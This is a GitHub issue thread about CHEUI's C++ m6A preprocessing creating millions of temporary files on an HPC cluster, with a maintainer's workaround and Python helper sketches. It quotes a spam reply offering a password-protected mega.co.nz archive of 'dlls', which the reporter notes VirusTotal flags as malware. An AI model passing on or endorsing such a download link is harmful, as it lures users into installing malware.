C++ preprocess (m6A) creates a large number of temporary files #43
Comments
Sorry, I'm confused by this comment. I'm not sure how this is applicable, and I also don't want to run precompiled code with no source, especially on a shared HPC cluster. I'm also using RHEL v9.4 on the cluster, not Windows. Furthermore, VirusTotal flags |
Thanks, Ollie, for the email.
I've cc'd Akanksha and Stefan from the lab, who might know how to
get around this.
E.
…On Sun, 29 Sept 2024 at 13:05, Oliver Cheng ***@***.***> wrote:
Hi all,
Not sure if this is a duplicate of #38.
I've been trying to get CHEUI up and running but have been running into an
issue with the preprocessing. Using the C++ preprocessing script (compiled
on GCC v11.3, RHEL 9.4, commit 7b422f7),
I have been running it on an 858GB nanopolish eventalign file, generated
from a ~2GB .fastq of reads.
In this instance, I noticed that the preprocessing script was producing an
absurd amount of temporary files - over 7 million, before the HPC file
quota ran out and the script was killed. (This was much to the chagrin of
my university's HPC admin, and I promptly received a very strongly worded
email advising me not to generate so many temporary files! 😅)
I've attached a small selection of ~1000 of these temporary files for
debugging purposes, if it interests you. Each file seems to be very small -
a few lines max, based off of my n = 10 sample size.
The aligned events file was called using:
nanopolish eventalign -t {threads} \
--reads {input.reads} \
--bam {input.bam} \
--genome {REF} \
--scale-events --signal-index --samples --print-read-names > {output}
and I was calling preprocess using:
# must first be in this path, or else the program crashes
cd $PATH_TO_CHEUI_PREPROCESS_DIR
./CHEUI -i $INPUT -m ../../kmer_models/model_kmer.csv -n {threads} --m6A -o $OUTPUT
See the attached sample of temporary files below: out_A_signals+IDs.zip
<https://github.com/user-attachments/files/17177384/out_A_signals%2BIDs.zip>
Let me know if there's anything else that you need.
Ollie
|
Sorry, I don't know where that comment was from.
Please disregard that message
E.
…On Sun, 29 Sept 2024 at 13:11, Oliver Cheng ***@***.***> wrote:
maybe this will help
https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
Password: changeme I put the necessary dlls in the archive
Sorry, I'm confused by this comment. I'm not sure how this is applicable,
and I also don't want to run precompiled code with no source, especially on
a shared HPC cluster. I also run RHEL v9, not Windows. VirusTotal also
flags x86_64-w64-ranlib.exe as malware. Are you affiliated with the Eyras
computational RNA biology group?
|
Did you check the possible solution given by @pre-mRNA? _We apologise for the issue. CHEUI currently generates a large number of intermediate files. You can process POD5 files sequentially to predict model 1, e.g.: POD5 1 -> eventalign -> preprocess_m6a -> CHEUI model 1. Before predicting model 2, you will need to merge and sort all the model 1 files. Hope this helps._ |
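The sequential approach quoted above could be sketched roughly as follows: each input is processed in its own scratch directory, only the final result is kept, and the intermediates are deleted before the next input starts, so the number of files on disk stays bounded. This is a minimal sketch, not CHEUI code. The name `process_sequentially` and the `step` callable are hypothetical placeholders; `step` stands in for whatever chain of commands (eventalign, preprocessing, model 1) is run per input, and it is assumed to return the path of the one file worth keeping.

```python
import shutil
import tempfile
from pathlib import Path
from typing import Callable, Iterable, List


def process_sequentially(
    inputs: Iterable[str],
    step: Callable[[Path, Path], Path],
    out_dir: Path,
) -> List[Path]:
    """Run `step(input_path, work_dir)` once per input, one input at a time.

    `step` is a hypothetical callable (an assumption, not a CHEUI API): it may
    write any number of intermediate files into `work_dir` and must return the
    path of the single result file to keep.
    """
    out_dir = Path(out_dir)
    out_dir.mkdir(parents=True, exist_ok=True)
    results: List[Path] = []
    for inp in inputs:
        # Each input gets a fresh scratch directory that is removed afterwards.
        with tempfile.TemporaryDirectory() as work:
            produced = step(Path(inp), Path(work))
            final = out_dir / produced.name
            # Move the result out before the scratch directory is deleted.
            shutil.move(str(produced), str(final))
            results.append(final)
    return results
```

The per-input results collected in `out_dir` would then still need to be merged and sorted before model 2, as the quoted reply says.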
Hi, Thanks for your reply. I have not tried it yet, as I am unsure about the quantity of intermediate files generated. I noticed that the solution above is for the Python preprocess script, while I am using the C++ script. I just wanted to first confirm that the small size of each temporary file (a few lines in size) is expected behaviour? |
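To check the file sizes on more than a sample of 10, a minimal sketch like the one below could tally how many lines each temporary file contains. The function name `summarise_small_files` and the `max_files` cap are assumptions for illustration. It uses `os.scandir` rather than building a full listing, which tends to be gentler on a shared filesystem when a directory holds millions of entries.

```python
import os
from collections import Counter
from typing import Tuple


def summarise_small_files(directory: str, max_files: int = 100_000) -> Tuple[int, Counter]:
    """Count regular files in `directory` and tally their line counts.

    Every file is counted, but only the first `max_files` encountered are
    opened, so the scan stays cheap on very large directories.
    Returns (total_file_count, Counter mapping line count -> number of files).
    """
    line_counts: Counter = Counter()
    total = 0
    with os.scandir(directory) as entries:
        for entry in entries:
            if not entry.is_file():
                continue
            total += 1
            if total <= max_files:
                # Binary mode avoids decoding errors on unexpected content.
                with open(entry.path, "rb") as fh:
                    n_lines = sum(1 for _ in fh)
                line_counts[n_lines] += 1
    return total, line_counts
```

Calling it on the directory holding the temporary files (the path depends on where the preprocessing step writes them) returns the total file count and a histogram of lines per file.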
Hi all,
Not sure if this is a duplicate of #38.
I've been trying to get CHEUI up and running but have been running into an issue with the preprocessing. Using the C++ preprocessing script (compiled on GCC v11.3, RHEL 9.4, commit 7b422f7808a3c2ffff56a9ead33a199824753b4e), I have been running it on an 858GB nanopolish eventalign file, generated from a ~2GB .fastq of reads.
In this instance, I noticed that the preprocessing script was producing an absurd amount of temporary files - over 7 million, before the HPC file quota ran out and the script was killed. (This was much to the chagrin of my university's HPC admin, and I promptly received a very strongly worded email advising me not to generate so many temporary files! 😅)
I've attached a small selection of ~1000 of these temporary files for debugging purposes, if it interests you. Each file seems to be very small - a few lines max, based off of my n = 10 sample size.
The aligned events file was called using:
nanopolish eventalign -t {threads} \
--reads {input.reads} \
--bam {input.bam} \
--genome {REF} \
--scale-events --signal-index --samples --print-read-names > {output}
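and I was calling preprocess using:
# must first be in this path, or else the program crashes
cd $PATH_TO_CHEUI_PREPROCESS_DIR
./CHEUI -i $INPUT -m ../../kmer_models/model_kmer.csv -n {threads} --m6A -o $OUTPUT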
See the attached sample of temporary files below: out_A_signals+IDs.zip
Let me know if there's anything else that you need.
Ollie